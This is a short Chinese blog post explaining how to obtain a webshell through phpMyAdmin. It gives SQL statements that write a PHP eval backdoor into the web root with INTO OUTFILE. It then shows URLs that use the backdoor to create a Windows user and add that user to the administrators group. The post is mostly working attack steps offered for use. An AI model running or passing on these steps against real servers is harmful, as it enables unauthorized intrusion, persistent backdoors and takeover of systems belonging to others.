当前位置: 首页 > PHP, 漏洞列表, 编程语言 > 正文

利用phpMyAdmin拿webshell

首先用暴路径漏洞找到绝对路径,然后替换下面的路径

随便选个数据库,然后执行以下的sql(利用sql命令导出一个shell)

Create TABLE a (cmd text NOT NULL);
Insert INTO a (cmd) VALUES('<?php @eval($_POST[cmd])?>');
select cmd from a into outfile 'D:\www\dmtz\bbs\upload\phpmyadmin\eval.php';
Drop TABLE IF EXISTS a;

这是我们的后门

http://xxx.com/phpmyadmin/eval.php

加个系统帐号
http://xxx.com/phpmyadmin/eval.php?cmd=net user test test /add
将test设置成系统管理员
http://xxx.com/phpmyadmin/eval.php?cmd=net localgroup administrators test /add


本文固定链接: http://www.chnpanda.com/531.html | 熊猫博客 | 转载请注明出处,谢谢合作!

本文关键字: , ,

利用phpMyAdmin拿webshell:等您坐沙发呢!

发表评论

亲,不支持纯字母、符号评论哦~